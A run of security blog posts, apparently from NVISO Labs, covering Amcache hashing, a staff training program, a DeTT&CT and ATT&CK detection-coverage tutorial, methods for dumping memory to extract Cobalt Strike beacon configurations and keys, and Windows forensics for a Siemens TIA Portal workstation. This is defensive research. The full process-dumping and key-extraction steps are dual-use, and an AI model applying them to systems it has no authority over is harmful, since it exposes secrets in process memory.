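    return sha1.hexdigest()
```

For a file like RegistryExplorer.exe this should reproduce the value stored in Amcache, while for files smaller than the limit it matches the regular full-file SHA-1.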

Putting this all next to each other:

File SHA-1 hash value
Original on disk E50B8FA6F73F76490818B19614EE8AEFD0AA7A49
Amcache entry 0f487a4beec16dba123cbc860638223abb51d432
Stripped file on disk 0f487a4beec16dba123cbc860638223abb51d432
Table 2: Comparing SHA-1 hashes for RegistryExplorer.exe

The SHA-1 hash of the first 31,457,280 bytes matches what is recorded in Amcache. I tested this on Windows 10 and Windows 8, both 64 bit versions, showing exactly the same behaviour.


The testing performed shows that Amcache records a SHA-1 hash for files, but for larger files only over the first 31,457,280 bytes. This also means that taking the SHA-1 hash from Amcache and searching for it online has its limitations: the size of the file needs to be taken into account.

Two very basic sayings in digital forensics and incident response have been proven right:

It depends!

Always validate!

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Keep on running ahead: NVISO’s Training Program

8 March 2022 at 09:00

NVISO is a pure-play specialist in cyber security: with specialists in every area of cyber security, we do everything cyber security and only cyber security. We are known for our customer dedication and our reputation for expertise.

Therefore, when you work for NVISO, we invest heavily in your personal development: to ensure you reach your full potential as a top class cyber security specialist. Expectations are high, but we equip you with the tools, know-how and the faith in your own skills to reach that high standard and guarantee the client’s satisfaction.

We value your personal growth 

Technology and cyber security are changing fast, but thanks to NVISO’s comprehensive training programme, we make sure that you are confident and always ahead of the game. At NVISO we have created a strong learning climate, which we have formalised by offering all employees a training budget of 10,000 euros and 10 man-days every two years.

Continuous learning through online training platforms 

How to spend that training budget wisely? Well, first of all, NVISO encourages continuous growth by offering employees access to various online training platforms. These platforms challenge you to take your cyber security skills to the next level in a hands-on, gamified and close-to-real-life environment. This way, we keep learning at NVISO practical and engaging.

Hack The Box offers a gigantic pool of virtual penetration testing labs and pro lab setups which simulate a fictional company environment to infiltrate. This allows you to level up your penetration testing and offensive engagement skills, keeping you up to date on the latest attack paths and exploit techniques.

Hack The Box is where it all started for me in the field of infosec. The main question people usually have about hacking is: “Where do I begin?”. For me, that was also a very difficult question to answer.

Until I came across Hack The Box. Slowly working through retired boxes using walkthrough videos from experienced people like Ippsec allowed me to build a solid base in a wide range of technologies. From there on, moving on to more advanced boxes and eventually pro labs, which simulate a real-life active directory network, was the icing on the cake for me. Furthermore, the platform keeps on growing and continuously adds new features!

At NVISO, we decided to get more out of Hack The Box by holding “Hack for Pizza Nights”. Every other Tuesday, we order food, get some beers, and gather in a group session to crack one or more boxes as a team in our own dedicated lab environment. These game nights allow everyone to learn new techniques and to have some fun with colleagues. Furthermore, NVISO provides new team members access to the Hack The Box Academy, in which they complete modules and follow tracks focused on a specific topic (e.g. Active Directory, Web pentesting, Cryptography…). This way, new NVISO members build a strong knowledge base in these subjects.

Firat Acar (Consultant, NVISO Germany)

Secure Code Warrior brings a gamified approach to secure coding. It provides an engaging platform for identifying vulnerabilities inside various coding languages and fixing them. This empowers you to understand the struggles of developers during assessment-driven and threat modelling projects.

Immersive Labs offers red team and blue team challenges that place you within real-life cybersecurity scenarios, keeping you in touch with the latest tools and attack techniques. By solving each challenge, you become better prepared to tackle emerging cyber security threats.

We keep learning fun

Learning at NVISO is not only engaging, we keep it fun as well. Every other Tuesday (unless the current regulations dictate otherwise of course), we gather up for our “hack for pizza nights”. During these game nights, we enjoy pizza and beers and hack some boxes together.

In addition, we’re always excited for a good old game of “capture the flag”. In these competitions organized by Hack The Box, we compete with other teams to solve a number of challenges in order to collect flags. The team that collects the most flags the fastest, wins the competition. One of the most fun and engaging ways to enhance your cyber security skills.

SANS Institute: A unique learning opportunity 

NVISO’s training budget also gives you the unique opportunity to participate in the highly renowned SANS courses. These high-quality and trusted training courses will empower you with the practical skills and knowledge you need to become a top cyber security expert in your area of expertise. Maybe you will even meet one of your colleagues in front of the classroom, as NVISO’s staff includes several SANS Institute senior instructors and course authors, who share their expertise with the cyber security world.

DeTT&CT: Mapping detection to MITRE ATT&CK

9 March 2022 at 09:36


Building detection is a complex task, especially with a constantly increasing number of data sources. Keeping track of these data sources and their corresponding detection rules, or avoiding duplicate detection rules covering the same techniques, can give detection engineers a hard time.

For a SOC, it is crucial to have a good overview and a clear understanding of its actual visibility and detection coverage in order to identify gaps, prioritize the development of new detection rules or onboard new data sources.

In this blog post, we will learn how DeTT&CT can help you build, maintain and score your visibility and detection coverage.

We will first talk about MITRE ATT&CK, which is a knowledge base of adversary TTPs (Tactics, Techniques and Procedures) and its “Navigator”, a matrix that visually describes adversary TTPs. Then, we will cover the structure and functionalities of DeTT&CT. Lastly, we will walk through the different steps to start documenting your own detection coverage.


MITRE ATT&CK is a knowledge base of adversary TTPs based on real-world observations and used by adversaries against enterprise networks. While ATT&CK does cover some tools and software used by attackers, the focus of the framework is on how adversaries interact with systems to accomplish their objectives.

ATT&CK contains a set of techniques and sub-techniques organized into a set of tactics. Tactics represent the “why” of an ATT&CK technique, the adversary’s tactical objective for a particular action. Such tactical objective can be to gain initial access, achieve persistence, move laterally, exfiltrate data, and so on.

Techniques and sub-techniques represent “how” an adversary achieves a tactical objective. As an example, an adversary may create a new Windows service to repeatedly execute malicious payloads and to persist even after a reboot. There are many ways or techniques to achieve a tactical objective.

These tactics and techniques are represented in a matrix containing, at the time of writing, 14 tactics and 188 techniques.

Figure 1: MITRE ATT&CK matrix

Nowadays, MITRE ATT&CK is firmly established with security professionals and forms a common vocabulary both for offense and defense. Adversary emulation teams use it to plan engagements and create scenarios based on realistic techniques used by real-world adversaries, detection teams use ATT&CK to assess their detection coverage and find gaps in their defenses, and cyber threat intelligence (CTI) teams track adversaries and threat actor groups by their use of TTPs mapped to the ATT&CK framework.

MITRE ATT&CK™ contains plenty of valuable information on:

  • TTPs (Tactics, Techniques and Procedures)
  • Groups (threat actors)
  • Software (software used by threat actors)
  • Data sources (visibility required for detection)
  • Mitigations

The relationship between these types of information can be visualised using the following diagram:

Figure 2: Relationship of entities within ATT&CK

To help us visualise this matrix and highlight TTPs, MITRE provides a web interface called ATT&CK Navigator. There is an online instance allowing you to easily and quickly test its functionalities, but if you intend to use it for more than testing, we highly recommend hosting your own instance.

To install a local instance, clone the GitHub repository and follow the procedure described in the documentation.

Figure 3: ATT&CK Navigator

Even though we could use the ATT&CK Navigator to document our detection coverage, it lacks more advanced functionality such as multi-level scoring, differentiation between visibility and detection, and separation based on platforms and data sources.

This gap is where DeTT&CT comes into play. Let us discover how this tool works and how it can help us build, maintain and score our visibility and detection coverage.



DeTT&CT stands for Detect Tactics, Techniques & Combat Threats. The framework was created at the Cyber Defence Center of Rabobank and is, at the time of writing, developed and maintained by Marcus Bakker and Ruben Bouman.

The purpose of DeTT&CT is to assist blue teams using MITRE ATT&CK to score and compare data log source quality, visibility coverage and detection coverage. By using this framework, blue teams can quickly detect gaps in the detection or visibility coverage and prioritize the ingest of new log sources.


DeTT&CT delivers a framework that can map the information you have on the entities available in ATT&CK, and helps you manage your blue team’s data, visibility, and detection coverage.

The DeTT&CT framework consists of different components:

  • a Python tool (DeTT&CT CLI)
  • YAML administration files
  • the DeTT&CT Editor (to create and edit the YAML administration files)
  • scoring tables for detections, data sources and visibility

DeTT&CT CLI is a Python script (dettect.py) that supports six different modes:

  • editor: start DeTT&CT editor web interface
  • datasource (ds): data source mapping and quality
  • visibility (v): visibility coverage mapping based on techniques and data sources
  • detection (d): detection coverage mapping based on techniques
  • group (g): threat actor group mapping
  • generic (ge): statistics on ATT&CK data sources and updates on techniques, groups and software

You can either use the command line interface or launch the editor to create and manage the different YAML administration files.

The DeTT&CT Framework uses YAML files to administer data sources, visibility, techniques and groups. The following file types can be identified:

  • Data sources administration
  • Technique administration (visibility and detection coverage)
  • Groups administration

We will talk about these administration files in a bit.

You can find sample administration files in the GitHub repository.

One of the first steps in using DeTT&CT is making an inventory of your data sources and scoring their data quality.

Data sources

Data sources are the raw logs or events generated by systems, e.g., security appliances, network devices, and endpoints. ATT&CK has over 30 different data sources which are further divided into over 90 data components. All those data components are included in this framework. These data sources are administered within the data source administration YAML file. For each data source, among others, the data quality can be scored. Within ATT&CK, these data sources are listed within the techniques themselves (e.g. T1003 in the Detection section).

Figure 4: ATT&CK Data source example

The data source scoring is based on multiple criteria from the data quality scoring table:

  • Data completeness
  • Data field completeness
  • Timeliness
  • Consistency
  • Retention
Figure 5: Data source quality scoring table


Visibility is used within DeTT&CT to indicate if you have sufficient data sources with sufficient quality available to be able to capture evidence for activities associated with ATT&CK techniques. Visibility is necessary to perform incident response, execute hunting investigations and build detections. Within DeTT&CT you can score the visibility coverage per ATT&CK technique. The visibility scores are administered in the technique administration YAML file.

Visibility scores are rated from 0 to 4:

Figure 6: Visibility scoring table


Only when the right data sources, with adequate data quality, are available to you for data analytics can your visibility be used to create new detections for ATT&CK techniques. Detections often trigger alerts and are hence followed up on by your blue team. Scoring and administering your detections is also done in the technique administration YAML file.

Detection scores are rated from -1 to 5:

Figure 7: Detection scoring table

You can assess the score of a detection based on the following table:

Figure 8: Detection scoring details


Let us now walk through the different steps to build detection coverage and perform gap analysis against a threat actor group. First, we need to install DeTT&CT.


You can easily install DeTT&CT, either using an image from Docker Hub or installing it locally. As with ATT&CK Navigator, we strongly suggest installing DeTT&CT locally if you are documenting your own organization’s detection coverage.

To install it locally, clone the repository from GitHub and install the required packages. You also need Python 3.6 or higher.


To install DeTT&CT, run the following commands:

git clone https://github.com/rabobank-cdc/DeTTECT
pip install -r requirements.txt

Once it is installed, you can either use the command line interface or launch the DeTT&CT Editor.

To launch DeTT&CT Editor, type in the following command:

python3 dettect.py e
  • e: start DeTT&CT editor locally
Figure 9: Launching DeTT&CT Editor

This will automatically open the editor interface in your web browser.

Figure 10: DeTT&CT Editor interface

Data source coverage

ATT&CK has over 30 different data sources, which are further divided into over 90 data components. All of the data components are included in this framework.

Using the YAML data source administration file you can administer your data sources and record the following:

  • The date when you registered the entry in DeTT&CT
  • The date when you connected the data source to your security data lake
  • In which product(s) the data resides
  • The type of system(s) the data source applies to
  • A flag to indicate if the data source can be used in data analytics
  • A possible comment
  • Data quality

In addition to the pre-defined fields, you can add further information by using key-value pairs.
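
As an illustration, a single data source entry in the YAML administration file could look roughly like the sketch below. Field names follow the DeTT&CT data source schema as we understand it at the time of writing; the dates, products and scores are invented for the example:

```yaml
data_sources:
  - data_source_name: Process Creation
    date_registered: 2021-09-01
    date_connected: 2021-06-15
    products: ['EDR']
    available_for_data_analytics: True
    comment: 'Collected by the EDR on Windows and Linux endpoints'
    data_quality:
      device_completeness: 4
      data_field_completeness: 3
      timeliness: 4
      consistency: 3
      retention: 2
```

In practice you will rarely write this by hand; the DeTT&CT Editor generates and maintains these entries for you.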

Let us first list our data sources using the DeTT&CT Editor.

Go to DeTT&CT Editor, select Data Sources and create a new file.

Figure 11: Configuring data source administration file

Then add data sources according to the data sources that you already have available.

Click “Add data source” and select one data source. MITRE ATT&CK data sources are documented on their website.

For example, let’s say that you have an EDR installed on your Windows and Linux endpoints. This EDR has the capability to monitor processes, so we can add the Process Creation data source.
Select the date since when you have been collecting this data source and the date you registered the data source in your data sources YAML file.

Figure 12: Setting up data sources

Keeping track of the dates can help you monitor your data source improvement. To generate a graph based on the data source administration file, you can run the command below:

python dettect.py ds -fd sample-data/data-sources-endpoints.yaml -g
Figure 13: Data sources improvement graph

The same kind of graph can be generated for visibility and detection improvement.

Setting the “Data source enabled” switch to yes will set all data quality scores to 1. If you want your configuration to be more accurate, you can modify these values according to the data source quality scoring table.

Enable the “Available for data analytics” switch if you centralized logs in a SIEM for example.

You could also add “Process Creation” to your data sources if you collect Sysmon event ID (EID) 1 or Windows EID 4688 events for example.

Let’s add the following data sources to complete our example:

  • Command Execution (Windows EID 4688 of cmd.exe, Powershell logging, bash_history, etc.)
  • Windows Registry Key Creation (EDR, Windows EID 4656 or Sysmon EID 12, etc.)
  • Network Traffic Flow (Netflow, Zeek logs, etc.)

Once you have added all your data sources, save your data source administration file by clicking on “Save YAML file”.

Figure 14: Saving your data source administration file

Now, we are going to convert this YAML file to a JSON file using the DeTT&CT CLI tool and load this JSON file as an ATT&CK layer into ATT&CK Navigator.

python3 dettect.py ds -fd ~/Downloads/data-sources-new.yaml -l

The relevant flags for this command are

  • ds: select data source mode
  • -fd: path to the data source administration YAML file
  • -l: generate a data source layer for the ATT&CK Navigator

Go to the ATT&CK Navigator web page and select Open Existing Layer. Choose “Upload from local” and select the JSON file we just created using the command above.

Figure 15: MITRE ATT&CK Navigator
Figure 16: Data source coverage

This layer represents the MITRE ATT&CK mapping based on the data sources that we specified in our data source administration file.

The colours, as explained in the legend, represent the percentage of data sources available for that particular technique.

Let’s look at some techniques from the Privilege Escalation tactic.

Figure 17: ATT&CK technique example

As an example, the Logon Script (Windows) technique requires the following data source coverage:

  • Windows Registry Key Creation
  • Process Creation
  • Command Execution

Fortunately for us, we already have all three data sources available.

Figure 18: ATT&CK Technique data source coverage

But, the Network Logon Script requires the following data sources:

  • Process Creation
  • Command Execution
  • Active Directory Object Modification
  • File Modification

As we only have 2 data sources available, the ATT&CK layer shows a coverage of 26-50%.
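
The bucket arithmetic is easy to reproduce. Below is a small sketch (not part of DeTT&CT itself; the data source names are just the ones from our example) that computes the percentage behind the Navigator legend:

```python
def coverage_percentage(available, required):
    """Percentage of a technique's listed data sources that we actually collect."""
    present = len(set(required) & set(available))
    return 100.0 * present / len(required)

# Data sources registered in our administration file:
available = ["Process Creation", "Command Execution",
             "Windows Registry Key Creation", "Network Traffic Flow"]

# Logon Script (Windows): all three listed data sources are available.
logon_script = ["Windows Registry Key Creation", "Process Creation", "Command Execution"]
print(coverage_percentage(available, logon_script))  # 100.0

# Network Logon Scripts: only 2 of the 4 listed data sources are available,
# which lands in the Navigator's 26-50% bucket.
network_logon = ["Process Creation", "Command Execution",
                 "Active Directory Object Modification", "File Modification"]
print(coverage_percentage(available, network_logon))  # 50.0
```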

Figure 19: Missing data sources

If you would like to improve the coverage for this particular technique, you would now know which data sources you need to integrate next in your detection.

Using the ATT&CK Navigator, you can also compare this data source layer with a threat analysis ATT&CK layer to spot gaps in your detection based on that threat analysis. You can also compare it to another data source layer to emphasize the benefits of integrating an additional data source in your detection.

Visibility coverage

The next step is to have a good understanding of where we have visibility, the level of visibility and where we lack visibility.

To get started, we can generate a technique administration YAML file based on our data source administration file, which will give us rough visibility scores. By default the argument --yaml will only include techniques in the resulting YAML for which the visibility score is greater than 0. To include all ATT&CK techniques that apply to the platform(s) specified in the data source YAML file, add the argument: --yaml-all-techniques.

python3 dettect.py ds -fd ~/Downloads/data-sources-new.yaml --yaml


python3 dettect.py ds -fd ~/Downloads/data-sources-new.yaml --yaml --yaml-all-techniques

The relevant flags for this command are

  • ds: select data source mode
  • -fd: path to the data source administration YAML file
  • --yaml: generate a technique administration YAML file with visibility scores based on the number of available data sources
  • --yaml-all-techniques: includes all ATT&CK techniques in the generated YAML file that apply to the platform(s) specified in the data source YAML file (you need to provide the --yaml argument for this)
Figure 20: Visibility coverage generation

Within the resulting YAML file, you can adjust the visibility score per technique based on expert knowledge or based on the quality of a particular data source.

If you want to easily edit the technique administration YAML file, you can load it using DeTT&CT Editor.

Figure 21: Technique administration file example

Per technique, you can see and edit the rough visibility score assigned based on the data source administration file. If needed, you can assign different scores for different platforms such as Windows, Linux, Network, or Cloud.

Figure 22: Technique visibility score

The score logbook will keep track of the changes within the score.

To visualize the visibility scores within an ATT&CK Navigator layer, run the following command and load the resulting file in ATT&CK Navigator.

python3 dettect.py v -ft ~/Downloads/techniques-administration-example-all.yaml -l

The relevant parameters and flags for this command are

  • v: visibility coverage mapping based on techniques and data sources
  • -ft: path to the technique administration YAML file
  • -l: generate a visibility layer for the ATT&CK Navigator
Figure 23: Visibility coverage layer
Figure 24: ATT&CK visibility coverage

Detection coverage

Now that we have listed our data sources and have a good understanding of our visibility, we need a good understanding of where we have detection coverage, the level of that detection, and where detection is lacking.

Using the same technique administration YAML file we used for our visibility coverage, we can administer our level of detection and record the following:

  • The type of system(s) the detection applies to (e.g. Windows endpoints, Windows servers, Linux servers, crown jewel x, etc.).
  • Where the detection resides (for example, it could be an event ID, the name of a detection rule/use case, SIEM, or a product name)
  • A possible comment.
  • The date when the detection was implemented or improved.
  • A detection score.

In addition to the pre-defined fields, you can add further information by using key-value pairs.

To allow detailed scoring of your detections per type of system, you can select multiple detections per technique in the YAML file. This can be achieved using the “applicable_to” property.

Figure 25: Technique administration – Applicable to

We recommend using the same applicable_to values between your technique and your data source administration file. A score logbook enables you to keep track of changes in the score by having multiple score objects.

Figure 26: Technique administration – Score logbook

To review the details, click on the “Score logbook” button:

Figure 27: Technique administration – Score logbook details
Figure 28: Technique detection score
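
In the raw YAML, the combination of applicable_to and the score logbook looks roughly like the sketch below. Field names reflect the DeTT&CT technique administration schema as we understand it; the technique, location and scores are invented for illustration:

```yaml
techniques:
  - technique_id: T1037.001
    technique_name: 'Logon Script (Windows)'
    detection:
      - applicable_to: ['Windows endpoints']
        location: ['SIEM use case: suspicious logon script registration']
        comment: ''
        score_logbook:
          - date: 2021-10-01
            score: 2
            comment: 'Initial rule based on registry key creation events'
```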

Do not forget to save your YAML file if you edit it with DeTT&CT Editor.

To generate a layer file for the ATT&CK Navigator based on the technique administration file, you can run the following command:

python3 dettect.py d -ft ~/Downloads/techniques-administration-example-all.yaml -l

The relevant parameters and flags for this command are

  • d: detection coverage mapping based on techniques
  • -ft: path to the technique administration YAML file
  • -l: generate a detection layer for the ATT&CK Navigator
Figure 29: Detection layer

As we gave a score to only one specific technique, only this technique will appear in our layer.

Figure 30: ATT&CK Detection coverage

Gap analysis against threat actor group

Additionally, you could compare your detection layer with your threat analysis layer or with a layer generated for a specific red team exercise to spot any gaps in your detection.

When performing adversary emulation, the red team will define a scope of techniques that mimics a known threat to an organization. They usually represent this scope by generating an ATT&CK matrix layer.

Let’s say this is the generated layer from the adversary emulation:

Figure 31: ATT&CK Red team layer

You can compare a threat actor group layer with either your detection or visibility coverage overlay. Use the following command to generate a layer that highlights the differences:

python3 dettect.py g -g sample-data/groups.yaml -o sample-data/techniques-administration-example-all.yaml -t detection
  • g: threat actor group mapping
  • -g: specify the ATT&CK Groups to include. Another option is to provide a YAML file with a custom group
  • -o: specify what to overlay on the group(s). To overlay Visibility or Detection, provide the technique administration YAML file.
  • -t {group,visibility,detection}: specify the type of overlay. You can choose between group, visibility or detection (default = group)
Figure 32: Threat actor group comparison

If we compare our detection layer to the red team exercise, we will have the following resulting layer:

Figure 33: ATT&CK Threat actor group vs detection

Lastly, you can also generate a layer that will compare your visibility and detection coverage. This will give you a decent overview of the techniques where you have visibility or detection.

To generate this layer, type one of the following commands:

python dettect.py d -ft ~/Downloads/techniques-administration-endpoints.yaml -o


python dettect.py v -ft sample-data/techniques-administration-endpoints.yaml -o

Both commands will generate the same output as shown in the following picture.

Figure 34: ATT&CK Detection vs Visibility


In this blog post, we learned how to build, maintain and score visibility and detection coverage with MITRE ATT&CK and DeTT&CT. Mapping your visibility and detection coverage to TTPs and visualizing it in the MITRE ATT&CK Navigator will help you better grasp your detection maturity. It also makes it possible to compare your detection coverage against a threat actor’s behaviour and spot possible gaps.

Maintaining a clear understanding of your current detection capabilities is crucial for your overall security posture. With this knowledge, detection engineers can prioritize the development of new detection rules and the onboarding of new data sources, red teams can tailor their campaigns to test the defenders’ assumptions about their capabilities, and decision makers can track progress and allocate resources to improve the security posture.

Setting up a baseline for the DeTT&CT framework requires some time and resources at first, but once it has been set up, it can provide you with insight into your current detection capabilities and where to focus improvements.


“DeTT&CT: Mapping your Blue Team to MITRE ATT&CK™ — MB Secure”,


“ATT&CK 101. This post was originally published May… | by Blake Strom | MITRE ATT&CK® | Medium”,

“rabobank-cdc/DeTTECT: Detect Tactics, Techniques & Combat Threats”,

“MITRE DeTTECT – Data Source Visibility and Mapping – YouTube”,

“ATT&CK® Navigator“,

Cobalt Strike: Memory Dumps – Part 6

11 March 2022 at 05:59

This is an overview of different methods to create and analyze memory dumps of Cobalt Strike beacons.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. In part 4, we deal with traffic obfuscated with malleable C2 data transforms. And in part 5, we deal with Cobalt Strike DNS traffic.

For some of the Cobalt Strike analysis methods discussed in previous blog posts, it is useful to have a memory dump: either a memory dump of the system RAM, or a process memory dump of the process hosting the Cobalt Strike beacon.

We provide an overview of different methods to make and/or use memory dumps.

Full system memory dump

Several methods exist to obtain a full system memory dump of a Windows machine. As most of these methods involve commercial software, we will not go into the details of obtaining a full memory dump.

When you have a full system memory dump that is uncompressed, the first thing to check is the presence of a Cobalt Strike beacon in memory. This can be done with 1768.py, a tool to extract and analyze the configuration of Cobalt Strike beacons. Make sure to use a 64-bit version of Python, as uncompressed full memory dumps are huge.

Issue the following command: 1768.py -r memorydump


Figure 1: Using 1768.py on a full system memory dump

In this example, we are lucky: not only does 1768.py detect the presence of a beacon configuration, but that configuration is also contained in a single memory page. That is why we get the full configuration. Often, the configuration will overlap memory pages, and then you get a partial result, sometimes even Python errors. But the most important piece of information we get from this command is that there is a beacon running on the system of which we took a full memory dump.

Let’s assume that our command produced partial results. What we have to do then, to obtain the full configuration, is to use Volatility to produce a process memory dump of the process(es) hosting the beacon. Since we don’t know which process(es) hosts the beacon, we will create process memory dumps for all processes.

We do that with the following command:

vol.exe -f memorydump -o procdumps windows.memmap.Memmap --dump


Figure 2: using Volatility to extract process memory dumps – start of command
Figure 3: using Volatility to extract process memory dumps – end of command

procdumps is the folder where all process memory dumps will be written to.

This command takes some time to complete, depending on the size of the memory dump and the number of processes.

Once the command has completed, we use 1768.py again to analyze each process dump:

Figure 4: using 1768.py to analyze all extracted process memory dumps – start of command
Figure 5: using 1768.py to analyze all extracted process memory dumps – detection for process ID 2760

We see that file pid.2760.dmp contains a beacon configuration: this means that the process with process ID 2760 hosts a beacon. We can use this process memory dump if we would need to extract more information, like encryption keys for example (see blog post 3 of this series).
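
The hosting process ID can be read straight from the name Volatility gives each dump file (pid.<PID>.dmp). A trivial helper, purely for illustration:

```python
import re

def pid_from_dumpname(name):
    """Extract the process ID from a Volatility memmap dump name like 'pid.2760.dmp'."""
    match = re.fullmatch(r"pid\.(\d+)\.dmp", name)
    return int(match.group(1)) if match else None

print(pid_from_dumpname("pid.2760.dmp"))  # 2760
```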

Process memory dumps
Different methods exist to obtain process memory dumps on a Windows machine. We will explain several methods that do not require commercial software.

Task Manager
A full process memory dump can be made with the built-in Windows’ Task Manager.
Such a process memory dump contains all the process memory of the selected process.

To use this method, you have to know which process is hosting a beacon. Then select this process in Task Manager, right-click, and select “Create dump file”:

Figure 6: Task Manager: selecting the process hosting the beacon
Figure 7: creating a full process memory dump

The process memory dump will be written to a temporary folder:

Figure 8: Task Manager’s dialog after the completion of the process memory dump
Figure 9: the temporary folder containing the dump file (.DMP)

Sysinternals’ Process Explorer
Process Explorer can make process memory dumps, just like Task Manager. Select the process hosting the beacon, right-click and select “Create Dump / Create Full Dump“.

Figure 10: using Process Explorer to create a full process memory dump

Do not select “Create Minidump”, as a process memory dump created with this option does not contain process memory.

With Process Explorer, you can select the location to save the dump:

Figure 11: with Process Explorer, you can choose the location to save the dump file

Sysinternals’ ProcDump
ProcDump is a tool to create process memory dumps from the command-line. You provide it with a process name or process ID, and it creates a dump. Make sure to use option -ma to create a full process memory dump, otherwise the dump will not contain process memory.

Figure 12: using procdump to create a full process memory dump

With ProcDump, the dump is written to the current directory.

Using process memory dumps
Just like with full system memory dumps, 1768.py can be used to analyze process memory dumps and to extract the beacon configuration.
As explained in part 3 of this series, cs-extract-key.py can be used to extract the secret keys from process memory dumps.
And if the secret keys are obfuscated, cs-analyze-processdump.py can be used to try to defeat the obfuscation, as explained in part 4 of this series.

Memory dumps can be used to detect and analyze beacons.
We developed tools to extract the beacon configuration and the secret keys from memory dumps.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Investigating an engineering workstation – Part 1

15 March 2022 at 09:00

In this series of blog posts we will deal with the investigation of an engineering workstation running Windows 10 with the Siemens TIA Portal Version 15.1 installed. In this first part we will cover some selected classic Windows-based evidence sources, and how they behave with regards to the execution of the TIA Portal and interaction with it. The second part will focus on specific evidence left behind by the TIA Portal itself and how to interpret it. Extracting information from a project and what needs to be considered to draw the right conclusions from this data will be the focus of the third post. Last but not least we will look at the network traffic generated by the TIA portal and what we can do in case the traffic is not being dissected nicely by Wireshark.

For the scope of this series of blog posts, we look at the Siemens TIA (Totally Integrated Automation) Portal as the software you can use to interact with and program PLCs. This is a simplified view, but it is sufficient to follow along with the blog posts. A PLC, or Programmable Logic Controller, can be viewed as a device specially designed to control industrial processes, like manufacturing, energy production and distribution, water supply and much more. The Siemens SIMATIC S7-1200, which we will mention later in this series, is just one example of the many representatives of this family.

If you approach your first engagement looking at a Windows system running the TIA Portal, you might have the same thought as I had: “Will some of the useful evidence sources, which I know and have used in other Windows-based investigations, be there waiting to be unearthed?” Since it is always better to know such things before an actual incident takes place, we will cover some of the more standard evidence sources and how they behave with regard to the TIA Portal. Please note that we will not elaborate on the ins and outs of every Windows-based evidence source we mention, as this is not meant to be a blog post explaining standard evidence.

Evidence of execution is available as you would expect. Knowing what to look for can help in forming answers faster and more precisely.

The Prefetch artifact, if enabled on the system, is written for “SIEMENS.AUTOMATION.PORTAL.EXE” and can be parsed like any other prefetch file. Additionally, the prefetch file for “SIEMENS.AUTOMATION.DIAGNOSTIC” also gets written or updated when the TIA Portal is started. If we have a look at the ShimCache (aka AppCompatCache), we can try to find the last time of execution by investigating the SYSTEM registry hive. On newer Windows systems, like the Windows 10 system in our example, you are out of luck regarding the last time of execution: it is no longer recorded.

Investigating a Windows 10 system and having the SYSTEM registry hive already open, the BAM key (ControlSet00x\Services\bam\State\UserSettings\$SID) will provide us with date and time information for application execution. Knowing the executable name (“Siemens.Automation.Portal.exe”) and using it in a simple search quickly reveals the information we are looking for.
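
The timestamps in the BAM values are stored as 64-bit Windows FILETIME values (100-nanosecond intervals since 1601-01-01 UTC). A short sketch to convert them when parsing the hive manually:

```python
from datetime import datetime, timedelta, timezone

def filetime_to_datetime(filetime):
    """Convert a 64-bit Windows FILETIME to a timezone-aware datetime."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return epoch + timedelta(microseconds=filetime // 10)

# The Unix epoch expressed as a FILETIME value:
print(filetime_to_datetime(116444736000000000))  # 1970-01-01 00:00:00+00:00
```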

Reviewing more user-related evidence, by analyzing the NTUSER.dat hives for the user accounts in scope of the investigation, leads us to the UserAssist key. Reviewing the subkeys starting with “CEBFF5CD…” and “F4E57C4B…” will give us the expected information, like run count, last executed time and so on. Just make sure you are looking into the correct values for each subkey. In the subkey starting with “F4E57C4B…” it is shortcuts we are looking into. In our installation the .lnk files are named “TIA Portal V15.1.lnk”, which is the default value, as it was not renamed by us.

Figure 1: TIA Portal related content in UserAssist Subkey “F4E57C4B…”

For the second subkey (“CEBFF5CD…”) we are looking at the executables, so the actual executable name is what we should search for.

Figure 2: TIA Portal related content in UserAssist Subkey “CEBFF5CD…”

But what about finding projects that have been present or opened on the machine you are investigating?

First of all, we should have an idea of what a project looks like. Usually it is not a single file; instead it is a structure of multiple folders and subfolders. Furthermore, it contains a file in the root directory of the project folder which you use to open the project in the TIA Portal. The file extension of these files changes with the version of the TIA Portal: “.apVERSION” is the current schema. This means a file created with the TIA Portal Version 15.1 will have “ap15_1” as its file extension; if created with TIA Portal Version 13, the file extension will be “ap13”.
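
The version-to-extension schema described above is mechanical enough to capture in a tiny helper (hypothetical, just to make the rule explicit):

```python
def ap_extension(tia_version):
    """Map a TIA Portal version string to its project file extension (".apVERSION")."""
    return "ap" + tia_version.replace(".", "_")

print(ap_extension("15.1"))  # ap15_1
print(ap_extension("13"))    # ap13
```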

The following screenshot shows the file extensions which can be opened with the TIA Portal Version 15.1 and provides further examples of the naming schema.

Figure 3: TIA Portal Version 15.1 supported file extensions

Below you can see an overview of the files and the directory structure of a test project, in our case created with Version 15.1 of the TIA Portal:

Figure 4: Example listing of a test project created with TIA Portal V15.1

Equipped with this information, we can check if and how the “.ap15_1” extension shows up in classic file use and knowledge artefacts.

Reviewing the recent files for a user by investigating the RecentDocs key in the corresponding NTUSER.dat hive shows a subkey for the “.ap15_1” extension.

Figure 5: RecentDocs subkey for .ap15_1 file extension
Figure 6: Example content of RecentDocs subkey for .ap15_1 file extension

The second screenshot shows an excerpt of the “.ap15_1” key parsed by Registry Explorer. Please note that if a project file is opened via the “Recently used” projects listing, shown on the starting view of the TIA Portal, the RecentDocs key is not updated.

Figure 7: TIA Portal view to open recently used projects

While we are dealing with user-specific evidence, we can also check if Jump Lists are available as we would expect. We can use the tool JLECmd by Eric Zimmerman to parse all Jump Lists and review the results in Timeline Explorer. By applying a filter to only show files ending with “.ap” we get the overview shown below.

Figure 8: Jump Lists entries showing .ap15_1 files

